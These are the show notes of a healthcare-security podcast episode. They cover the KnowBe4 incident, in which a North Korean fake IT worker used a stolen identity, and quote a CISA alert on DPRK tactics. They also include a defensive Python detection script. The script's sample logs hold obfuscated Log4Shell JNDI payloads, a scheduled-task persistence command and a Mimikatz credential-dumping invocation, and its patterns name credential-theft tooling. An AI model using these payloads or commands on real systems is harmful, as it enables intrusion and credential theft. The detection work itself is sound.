
How Well Do You Know Remote Workers? – Ep 470 

 August 9, 2024

By  Donna Grindle

How well do you really know your remote workers? With remote work increasingly becoming the norm, the complexity of securing devices and monitoring access has skyrocketed, and providing robust security for an increasingly dispersed workforce is a real challenge. Real-world examples like the KnowBe4 incident, where a remote hire used a stolen identity to get inside company systems, show why layered security and proactive monitoring matter. Our discussion today highlights the need to understand the subtle threats posed by cyber attackers, especially when sensitive patient data and HIPAA compliance are involved.



Today’s Episode is brought to you by:

Kardon

and

HIPAA for MSPs with Security First IT


405(d) Tip of the Week

[03:38]

HHS 405(d) Program Transitions to the Administration for Strategic Preparedness and Response (ASPR)

The Administration for Strategic Preparedness and Response (ASPR) is the Sector Risk Management Agency (SRMA) for the Healthcare and Public Health (HPH) sector, so the change makes sense from an organizational perspective. However, it remains to be seen how much impact it will have on the productivity of our group. The announcement made to leaders last week sounded an awful lot like the ones I heard during corporate acquisitions: “nothing will change,” while deep down everyone knows it will all be upended and started from scratch.

Stay tuned for our thoughts as things progress.

How Well Do You Know Remote Workers?

[07:06]

How a North Korean Fake IT Worker Tried to Infiltrate Us

North Korean Fake IT Worker FAQ

Kudos to KnowBe4 for announcing that this happened and sharing the details. It is only with this kind of transparency that we will be able to catch these things before they happen to someone in a more destructive way. As Stu Sjouwerman said, “If it can happen to us, it can happen to almost anyone.”

Let’s talk about what happened and what you should learn from it. The good news is that between their advanced monitoring tools and some good old-fashioned human vigilance, they spotted this guy’s unusual activity, and bam! The jig was up.

Oh, and while we’re at it, let’s not ignore the broader picture. CISA is shouting from the rooftops about North Korean cyber threats, especially those hitting our healthcare sector. The DOJ is even throwing charges at these hackers like confetti, trying to find a way to stop them. This is the part everyone always wants to know: why don’t they just stop them? Well... in this case they are in another country, one that happens to be a hermit nation and a committed adversary of ours.

North Korea Cyber Group Conducts Global Espionage Campaign to Advance Regime’s Military and Nuclear Programs | CISA

North Korean Government Hacker Charged for Involvement in Ransomware Attacks Targeting U.S. Hospitals and Health Care Providers

If it can happen to us

[14:44] From the KnowBe4 blog post, Incident Report Summary: Insider Threat:

No illegal access was gained, and no data was lost, compromised, or exfiltrated on any KnowBe4 systems. This is not a data breach notification, there was none. See it as an organizational learning moment I am sharing with you. If it can happen to us, it can happen to almost anyone. Don’t let it happen to you.

TLDR: KnowBe4 needed a software engineer for our internal IT AI team. We posted the job, received resumes, conducted interviews, performed background checks, verified references, and hired the person. We sent them their Mac workstation, and the moment it was received, it immediately started to load malware.

Our HR team conducted four video-conference-based interviews on separate occasions, confirming the individual matched the photo provided on their application. Additionally, a background check and all other standard pre-hiring checks were performed and came back clear due to the stolen identity being used. This was a real person using a valid but stolen US-based identity. The picture was AI “enhanced”.

The EDR software detected it and alerted our InfoSec Security Operations Center. The SOC called the new hire and asked if they could help. That’s when it got dodgy fast. We shared the collected data with our friends at Mandiant, a leading global cybersecurity expert, and the FBI, to corroborate our initial findings. It turns out this was a fake IT worker from North Korea. The picture you see is an AI fake that started out with stock photography (below). The detail in the following summary is limited because this is an active FBI investigation.

– Stu Sjouwerman

Why would North Korea want access to KnowBe4?

[18:54]

There are so many reasons it can make your head spin.

  • Email addresses
  • Access to domain servers for clients
  • Access to phishing emails that worked and who they worked against!
  • Ability to launch ransomware attacks through the phishing tests that you are actually running yourself!

The actors gain initial access through widespread exploitation of web servers through known vulnerabilities in software, such as Log4j, to deploy a web shell and gain access to sensitive information and applications for further exploitation. The actors then employ standard system discovery and enumeration techniques, establish persistence using Scheduled Tasks, and perform privilege escalation using common credential stealing tools such as Mimikatz. The actors deploy and leverage custom malware implants, remote access tools (RATs), and open source tooling for execution, lateral movement, and data exfiltration.

The actors also conduct phishing activity using malicious attachments, including Microsoft Windows Shortcut File (LNK) files or HTML Application (HTA) script files inside encrypted or unencrypted zip archives.

– CISA Alert
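The CISA alert quoted above lists the group’s tradecraft (Log4j exploitation, scheduled-task persistence, Mimikatz, LNK or HTA files inside zip attachments) but not what those look like in your own logs. What follows is an added example written for these notes, not code from the podcast, KnowBe4, or CISA: a small Python rule set run over constructed sample log lines. The log formats, host names and addresses are invented for illustration, and the ATT&CK technique IDs are my own mapping of each rule.

```python
import re
from typing import Callable, List, Tuple

# Constructed sample log lines for this example (not real telemetry from
# KnowBe4, CISA, or any incident). Three sources are mixed: a web access
# log, Windows process-creation events (4688), and a mail-gateway log.
SAMPLE_LOGS = [
    'web src=198.51.100.7 req="GET /index.jsp" ua="${jndi:ldap://203.0.113.9:1389/a}"',
    'web src=198.51.100.8 req="GET /api/health" ua="Mozilla/5.0"',
    'web src=198.51.100.7 req="GET /login" ua="${${lower:j}ndi:${::-l}dap://203.0.113.9:1389/b}"',
    'win4688 host=WS01 user=CORP\\jdoe cmd="schtasks /create /tn Updater /tr C:\\Users\\Public\\u.exe /sc minute /mo 5"',
    'win4688 host=WS01 user=CORP\\jdoe cmd="schtasks /query /tn Updater"',
    'win4688 host=WS01 user=CORP\\jdoe cmd="C:\\Users\\Public\\svc.exe privilege::debug sekurlsa::logonpasswords"',
    'mail from=hr@example.test attach="Resume.zip" contents="Resume.pdf.lnk"',
    'mail from=it@example.test attach="invoice.zip" encrypted=yes contents="invoice.hta"',
    'mail from=alice@example.test attach="report.zip" contents="report.pdf,notes.txt"',
]

# Log4j lookup obfuscations seen in the wild: ${lower:j}, ${upper:J}, ${::-j}.
_LOG4J_OBF = re.compile(r"\$\{(?:lower|upper):([^}])\}|\$\{::-([^}])\}", re.IGNORECASE)


def normalize_log4j(text: str) -> str:
    """Collapse nested Log4j lookups so '${${lower:j}ndi:' reads as '${jndi:'.
    Repeats until nothing changes, since wrappers can be nested."""
    previous = None
    while previous != text:
        previous = text
        text = _LOG4J_OBF.sub(lambda m: (m.group(1) or m.group(2)).lower(), text)
    return text.lower()


def is_jndi_lookup(line: str) -> bool:
    """Log4Shell-style JNDI lookup in any request field (T1190)."""
    return "${jndi:" in normalize_log4j(line)


_SCHTASKS_CREATE = re.compile(r"\bschtasks(?:\.exe)?\b.*?/create\b", re.IGNORECASE)


def is_schtasks_create(line: str) -> bool:
    """Scheduled-task creation from a command line (T1053.005); /query is ignored."""
    return bool(_SCHTASKS_CREATE.search(line))


# Match Mimikatz module syntax, not just the binary name, so a renamed copy still fires.
_CRED_DUMP = re.compile(r"mimikatz|sekurlsa::|lsadump::", re.IGNORECASE)


def is_credential_dumping(line: str) -> bool:
    """Mimikatz invocation by name or by module syntax (T1003.001)."""
    return bool(_CRED_DUMP.search(line))


_ZIP_ATTACHMENT = re.compile(r'attach="[^"]*\.zip".*?contents="([^"]*)"', re.IGNORECASE)


def is_lnk_hta_in_zip(line: str) -> bool:
    """LNK or HTA file inside a zip attachment, encrypted or not (T1566.001).
    Relies on the gateway logging the archive's file listing."""
    match = _ZIP_ATTACHMENT.search(line)
    if not match:
        return False
    names = (n.strip().lower() for n in match.group(1).split(","))
    return any(n.endswith((".lnk", ".hta")) for n in names)


RULES: List[Tuple[str, str, Callable[[str], bool]]] = [
    ("log4shell_jndi_lookup", "T1190", is_jndi_lookup),
    ("scheduled_task_create", "T1053.005", is_schtasks_create),
    ("credential_dumping", "T1003.001", is_credential_dumping),
    ("lnk_or_hta_in_zip", "T1566.001", is_lnk_hta_in_zip),
]


def scan(lines: List[str]) -> List[Tuple[int, str, str]]:
    """Return (line_index, rule_name, attack_technique) for every rule that fires."""
    hits = []
    for index, line in enumerate(lines):
        for name, technique, predicate in RULES:
            if predicate(line):
                hits.append((index, name, technique))
    return hits


if __name__ == "__main__":
    for index, name, technique in scan(SAMPLE_LOGS):
        print(f"line {index}: {name} ({technique})")
```

The Log4j rule normalizes the ${lower:} and ${::-} wrappers before matching, because a plain search for ${jndi: misses the obfuscated variant, and the Mimikatz rule keys on module syntax so a renamed binary still fires. A real detection would read the same fields from your SIEM or EDR rather than from strings, but the logic is the same.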

With the DOJ announcement we know they have been able to identify specific individuals, but will that amount to any punishment effective enough to deter them? Doubtful, since they are doing this for their country. It is nice to see that in this case they were able to recover some of the money.

If you have information “leading to the identification or location of any person who, while acting at the direction or under the control of a foreign government, engages in certain malicious cyber activities against U.S. critical infrastructure”, you can receive a reward of up to $10 million: Rewards for Justice – Reward Offer for Information on North Korean Malicious Cyber Actor Targeting U.S. Critical Infrastructure – United States Department of State

Big takeaways here

[36:03]
  • Threat intelligence sharing is essential to our ability to fight these attackers.
  • They are backed by their own government, but they also use attacks on our entities to fund themselves and to gain footholds all over the world.
  • We are trying to find them and stop them, but that is much easier said than done.
  • Do your background checks, and remember that a valid but stolen identity can pass them.
  • Have layers of security in place and limit access for new staff until they have earned it.
  • Do regular security audits.
  • This is another BOLO (be on the lookout) example, too.

The digital landscape is ever-evolving, and so are the tactics of cyber adversaries. The KnowBe4 incident is a stark reminder that even the most vigilant organizations can be targeted. Whether your employees are local or remote, limiting access rights is crucial. Just because someone has been around for years doesn’t mean they need the keys to the entire kingdom. Layered security measures and continuous monitoring can catch suspicious activity before it escalates. By staying proactive and cautious, you can significantly reduce the risk.


HIPAA is not about compliance, it’s about patient care.™

Special thanks to our sponsors Security First IT and Kardon.
